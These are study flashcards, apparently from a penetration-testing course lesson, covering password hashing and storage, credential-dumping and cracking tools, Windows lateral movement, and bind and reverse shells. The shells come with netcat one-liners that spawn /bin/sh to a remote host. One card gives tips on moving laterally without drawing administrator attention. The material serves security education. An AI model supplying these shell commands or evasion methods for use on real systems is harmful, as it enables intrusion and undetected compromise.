Lesson 16 - Leveraging the Attack Flashcards
What is the term for a file containing data captures from system memory
Dump File
What is the random generated string that can be added to the password before hashing
Salt
What is the Brute Force attack in which multiple user accounts are tests with a dictionary common passwords
Password Spraying
Where were LInux passwords originally stored and where are the currently and why
/etc/passwd
/etc/shadow - uses a hashing algorithm based on distribution
Most recently SHA-256 or SHA-512
Where does Windows stored local usernames and passwords
Security Account Manager (SAM)
Passwords are stored in two types -
LanMan (LM) Hash.
NT Hash - simple MD4
What is LSASS in Windows
Windows Local Security Authority - LSA Secrets stores password details
What is the password cracking tools that gathers credentials by extracting key elements from memory
Mimikatz
Modern password and hash cracking tool that can speed up the process by using different attack methods (dictionary, brute, mask)
Hashcat
Parallel brute-forcer for network logins, Focus to support numerous network services that allow remote authentication
Medusa
Tool that allows to interpret results from Nmap scan to automatically start Medusa agains open port
Brutespray
Similar to Medusa but support parallel testing of several networks authentication. Bundled with pw-inspect
Hydra
Highly optimized password cracker and can identify a large set of hashes with its community edition - mult platforms
John the Ripper
URL Brute Forcer that comes bundled with different word lists geared towards web applications and site directories
DirBuster
Does Burpsuite has a password cracker
Yes. -has a module for that
What tools can I use for post-exploitation in a network that uses Windows AD
Responder.py
BloodhoundAD
Name some methods of LoTL to perform lateral movements
PsExec, WMI, Login using Telnet or SSH
Note - these can stand out to administrator
What are other methods for lateral movement that will not bring as much attention to the tester or hacker
Using RPC for inter-process communication between local and remote process on Windows. then utilized Distributed Component Object Model (DCOM) to enable communications of software components
DCOM apps use RPC as a transport mechanism for client requests
MMC2.0Application includes an ExecuteShellCommand()
What are the two types of shell attacks
Bind Shell - target system binds it shell to a local port and an attacker’s shell communicates
NetCat is the most common tool
nc -lp 12345 -e /bin/sh
Reverse Shell - a malicious remote command shell where the victim host opens the connection to attacking hosts
nc -lp 12345 from host
Target
nc 192…. 12345 -e /bin/sh
Reverse shells are more effective since they are outbound and not as impacted from a firewall rule
What is the type of password attack that creates variants and combinations of word lists in an attempt to crack a password
Rule Attack
What is the parameter of NC which allows multiple subsequent connections to Windows bind shell
-L
What common meterpreter command is not present in the PHP Variant
getsystem